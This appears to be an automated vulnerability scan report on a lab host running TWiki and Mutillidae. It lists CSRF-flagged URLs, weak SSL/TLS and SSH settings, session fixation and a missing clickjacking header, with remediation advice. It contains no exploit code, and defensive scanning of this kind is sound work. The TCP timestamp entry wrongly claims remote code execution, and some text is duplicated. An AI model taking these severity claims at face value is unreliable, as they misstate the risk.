http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?t=1595894863 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894865 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894865 |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894669 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894669 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye?t=1595894868 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye?t=1595894868 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894869 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894869 |
http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?t=1595894745 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/GoodStyle?t=1595894745 |
http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894694 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894694 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebSiteToolsHnuxrfHrpDye |
http://192.168.105.200/twiki/bin/edit/TWiki/sit?t=1595894814 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/sit?t=1595894814 |
http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894618 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894618 |
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE |
http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules?t=1595894746 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/TextFormattingRules?t=1595894746 |
http://192.168.105.200/twiki/bin/edit/Main/WebHome | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHome |
http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG?t=1595894670 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WIKILOGOIMG?t=1595894670 |
http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894615 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHome?t=1595894615 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707 |
http://192.168.105.200/twiki/bin/edit/TWiki/whether?t=1595894921 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/whether?t=1595894921 |
http://192.168.105.200/twiki/bin/edit/TWiki/top?t=1595894720 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/top?t=1595894720 |
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL?t=1595894667 | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOURL?t=1595894667 |
http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG?t=1595894615 | Target:http://192.168.105.200/twiki/bin/edit/Main/WIKILOGOIMG?t=1595894615 |
http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894665 | Target:http://192.168.105.200/twiki/bin/edit/Main/WebHomesmLtmqbQKQKMtrskOTeZNsnAsnIxaanjXYFH?t=1595894665 |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894869 | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894869 |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh | Target:http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) |
1. Validate the request source by adding a one-time token.
It was possible to detect the usage of the deprecated SSLv2 and/or SSLv3 protocol on this system. An attacker might be able to use the known cryptographic flaws to eavesdrop the connection between clients and the service to get access to sensitive data transferred within the secured connection. An attacker might be able to use the known cryptographic flaws to eavesdrop the connection between clients and the service to get access to sensitive data transferred within the secured connection.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432,It was possible to detect the usage of the deprecated SSLv2 and/or SSLv3 protocol on this system. An attacker might be able to use the known cryptographic flaws to eavesdrop the connection between clients and the service to get access to sensitive data transferred within the secured connection. An attacker might be able to use the known cryptographic flaws to eavesdrop the connection between clients and the service to get access to sensitive data transferred within the secured connection. |
# | Reference |
---|---|
1 | :https://www.enisa.europa.eu/activities/identity-and-trust/library/deliverables/algorithms-key-sizes-and-parameters-report, |
2 | :https://bettercrypto.org/ |
It is recommended to disable the deprecated SSLv2 and/or SSLv3 protocols in favor of the TLSv1+ protocols. Please see the references for more information.
This host is prone to an information disclosure vulnerability. Successful exploitation will allow a man-in-the-middle attackers gain access to the plain text data stream. Impact Level: Application
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432,This host is prone to an information disclosure vulnerability. Successful exploitation will allow a man-in-the-middle attackers gain access to the plain text data stream. Impact Level: Application |
# | Reference |
---|---|
1 | :https://www.openssl.org/~bodo/ssl-poodle.pdf, |
2 | :https://www.imperialviolet.org/2014/10/14/poodle.html, |
3 | :https://www.dfranke.us/posts/2014-10-14-how-poodle-happened.html, |
4 | :http://googleonlinesecurity.blogspot.in/2014/10/this-poodle-bites-exploiting-ssl-30.html |
Disable SSL v3.0
The remote service is using a SSL certificate chain that has been signed using a cryptographically weak hashing algorithm.
CVE: [*]
CVSS Score: 4.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432,The remote service is using a SSL certificate chain that has been signed using a cryptographically weak hashing algorithm. |
# | Reference |
---|---|
1 | :https://blog.mozilla.org/security/2014/09/23/phasing-out-certificates-with-sha-1-based-signature-algorithms/ |
The TLS service uses Diffie-Hellman groups with insufficient strength (key size < 2048). An attacker might be able to decrypt the TLS communication offline.
CVE: [*]
CVSS Score: 4.0
Node(s) | Additional Information |
---|---|
192.168.105.200:5432 | Target: IP: 192.168.105.200 Port: 5432,The TLS service uses Diffie-Hellman groups with insufficient strength (key size < 2048). An attacker might be able to decrypt the TLS communication offline. |
# | Reference |
---|---|
1 | :https://weakdh.org/ |
Deploy (Ephemeral) Elliptic-Curve Diffie-Hellman (ECDHE) or use a 2048-bit or stronger Diffie-Hellman group. (see https://weakdh.org/sysadmin.html)
SESSION can be solidified by constructing malicious URLs, and related operations and attacks can be carried out by luring users to login using SESSION.
CVE: [*]
CVSS Score: 4.3
Node(s) | Additional Information |
---|---|
http://192.168.105.200/mutillidae/index.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target: http://192.168.105.200:80/mutillidae/ There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=add-to-your-blog.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/?page=show-log.php | Target: http://192.168.105.200:80/mutillidae/ There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/ | Target: http://192.168.105.200:80/mutillidae/ There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target: http://192.168.105.200:80/mutillidae/ There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=password-generator.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
http://192.168.105.200/mutillidae/index.php?page=usage-instructions.php | Target: http://192.168.105.200:80/mutillidae/index.php There is a Session solidification vulnerability, session:PHPSESSID |
# | Reference |
---|---|
N/A |
1. Generate SESSIONID dynamically.
Because no response header X-Frame-Options is set in the application, it is vulnerable to click-hijacking attacks. Click-hijacking is a visual deception. An attacker uses a transparent and invisible iframe to cover a web page and then induces the user to operate on it. At this time, the user clicks on a transparent iframe page without knowing it. By adjusting the location of the iframe page, users can be enticed to click on some functional buttons on the iframe page. Attackers often cooperate with social workers to complete the attack. For example, an attacker can click and hijack through flash to control the camera of the user's computer. With the development of touch-screen technology, click hijacking attack is further developed. Due to the limited screen of mobile phones, mobile browsers hide the address bar in order to save space, so visual deception on mobile phones is easier to implement.
CVE: [*]
CVSS Score: 3.1
Node(s) | Additional Information |
---|---|
http://192.168.105.200 | Target: http://192.168.105.200 No response header X-Frame-Options is set. |
# | Reference |
---|---|
N/A |
1. Disallow the nesting of iframe, the frame busting method, through JavaScript code. 2. Restrict iframe loading by setting the response header X-Frame-Options. DENY: Refuse browsers to load any frame pages, SAMEORIGIN: Frame page address can only be pages under the same domain name. ALLOW-FROM: You can customize the page address that allows frame to load. In addition, some browser vendors have added extensions to defend against clickjacking, such as Firefox's "content security POlicy'and'No-script
The remote SSH server is configured to allow weak MD5 and/or 96-bit MAC algorithms.
CVE: [*]
CVSS Score: 2.6
Node(s) | Additional Information |
---|---|
192.168.105.200:22 | Target: IP: 192.168.105.200 Port: 22,The remote SSH server is configured to allow weak MD5 and/or 96-bit MAC algorithms. |
# | Reference |
---|---|
N/A |
Disable the weak MAC algorithms.
The remote host implements TCP timestamps and therefore allows to compute the uptime. Successful exploitation could result in remote arbitrary code execution, spoofing attacks, sensitive information disclosure, and can crash the browser. Impact Level : System A side effect of this feature is that the uptime of the remote host can sometimes be computed.
CVE: [*]
CVSS Score: 2.6
Node(s) | Additional Information |
---|---|
192.168.105.200 | Target: IP 192.168.105.200 ,The remote host implements TCP timestamps and therefore allows to compute the uptime. Successful exploitation could result in remote arbitrary code execution, spoofing attacks, sensitive information disclosure, and can crash the browser. Impact Level : System A side effect of this feature is that the uptime of the remote host can sometimes be computed. |
# | Reference |
---|---|
1 | :http://www.ietf.org/rfc/rfc1323.txt |
To disable TCP timestamps on linux add the line 'net.ipv4.tcp_timestamps = 0' to /etc/sysctl.conf. Execute 'sysctl -p' to apply the settings at runtime. To disable TCP timestamps on Windows execute 'netsh int tcp set global timestamps=disabled' Starting with Windows Server 2008 and Vista, the timestamp can not be completely disabled. The default behavior of the TCP/IP stack on this Systems is, to not use the Timestamp options when initiating TCP connections, but use them if the TCP peer that is initiating communication includes them in their synchronize (SYN) segment. See also: http://www.microsoft.com/en-us/download/details.aspx?id=9152